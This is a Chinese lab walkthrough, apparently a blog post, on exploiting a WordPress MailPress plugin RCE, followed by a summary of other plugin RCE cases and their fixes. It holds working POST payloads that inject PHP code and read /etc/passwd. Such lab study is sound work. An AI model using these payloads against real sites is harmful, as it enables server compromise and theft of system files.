WordPress-Mailpress远程代码执行漏洞——利用

本文介绍如何利用WordPress MailPress插件中的漏洞创建Web Shell并读取敏感文件。通过安装Firefox插件HackBar,构造特定POST数据提交恶意PHP代码,最终实现远程代码执行。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

相关资料:

http://www.jeeseen.com/archives/421.html

http://www.xingkonglangzi.com/post-662.html

https://www.exehack.net/3509.html

https://github.com/Medicean/VulApps/tree/master/w/wordpress/2

我的漏洞环境是http://X.X.X.X:18000/(我的便宜安全师父搭的)

一、首先,我使用Firefox,在Firefox里添加一个叫做HackBar的插件:

直接使用Firefox浏览器搜索HackBar,选中第一个点进去


点进去之后添加HackBar到Firefox,然后按照提示重启Firefox就好:


重启之后的Firefox会在顶端多出一点东西:


二、接下来就是利用漏洞了:

按照那些资料提示,我们把URL写到HackBar中(注意这里的URL是你的漏洞环境的ip地址和端口),然后选中enable post data写要提交的数据:

  URL:

 
http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php
post:
action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php phpinfo();?>&html=&plaintext=&mail_format=standard&autosave=1


把上一步得到的ID写在下一步的URL中

URL:

http://漏洞环境ip:端口号/wp-content/plugins/mailpress/mp-includes/action.php?action=iview&id=上一步得到的ID


到这里该漏洞的基本的利用已经实现

三、师父还留个扩展问题,利用php系统函数去尝试读取 /etc/passwd 文件:

这里就把前面的post数据中subject的数据改掉,改为<?php echo file_get_contents('/etc/passwd')?>

改过后的post数据为:

action=autosave&id=0&revision=-1&toemail=&toname=&fromemail=&fromname=&to_list=1&Theme=&subject=<?php echo file_get_contents('/etc/passwd')?>&html=&plaintext=&mail_format=standard&autosave=1

相关步骤及结果截图如下:






WordPress插件中的远程代码执行(RCE)漏洞是一个严重的安全问题,可能导致攻击者在受影响的系统上执行任意代码。以下是几个典型的漏洞案例及其分析与修复方案。 ### WordPress Social Warfare 组件 RCE 漏洞 在 `\wordpress\wp-content\plugins\social-warfare\lib\utilities\SWP_Database_Migration.php` 文件中,`debug_parameters()` 函数使用了 `eval()` 来执行用户提供的参数,并且未对输入进行严格的过滤或验证。这使得攻击者可以通过构造恶意请求来执行任意 PHP 代码 [^2]。 **修复方案:** - 更新到最新版本的 Social Warfare 插件- 如果无法更新,请手动修补 SWP_Database_Migration.php 文件,移除或禁用 `eval()` 的使用。 - 对所有外部输入数据进行严格的验证和清理,避免直接执行未经处理的数据。 ```php // 示例:移除 eval() 使用 function debug_parameters($options) { // 不推荐使用 eval() // $result = eval($options); // 替代方案:记录调试信息而不是执行 error_log("Debug options: " . print_r($options, true)); } ``` ### Formidable Forms 和 Shortcodes Ultimate 组合插件 RCE 漏洞 Formidable Forms 允许非授权用户预览表单,但未对上传的 HTML 内容进行充分检查,导致潜在的 XSS 和 shortcode 执行风险。当与支持自定义 shortcode 的 Shortcodes Ultimate 插件结合时,这种缺陷可能被利用来实现远程代码执行 [^3]。 **修复方案:** - 确保 Formidable Forms 和 Shortcodes Ultimate 都更新至最新版。 - 禁止非授权用户访问敏感功能,如表单预览。 - 在处理用户提交的内容时,实施严格的输入验证机制,例如白名单过滤和输出编码。 ```php // 示例:对用户输入进行过滤 function sanitize_user_input($input) { return htmlspecialchars(strip_tags($input), ENT_QUOTES, 'UTF-8'); } ``` ### WordPress 主题库本地文件包含导致 RCE 漏洞 通过路径遍历攻击覆盖特定 Post Meta 条目,攻击者可以将恶意文件绑定到合法的 Post Meta 上,从而触发远程代码执行 [^4]。 **修复方案:** - 升级 WordPress 至 5.0.1 或更高版本以获得官方补丁。 - 审查并加固服务器上的文件权限设置,确保只有受信任的用户才能修改关键文件。 - 实施 Web 应用防火墙 (WAF),监控和阻止异常请求。 ```php // 示例:加强文件包含逻辑的安全性 function secure_include($filename) { if (!file_exists($filename)) { throw new Exception('File not found.'); } // 只允许包含指定目录下的文件 if (strpos(realpath($filename), WP_CONTENT_DIR) !== 0) { throw new Exception('Access denied to requested file.'); } include $filename; } ``` ###
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值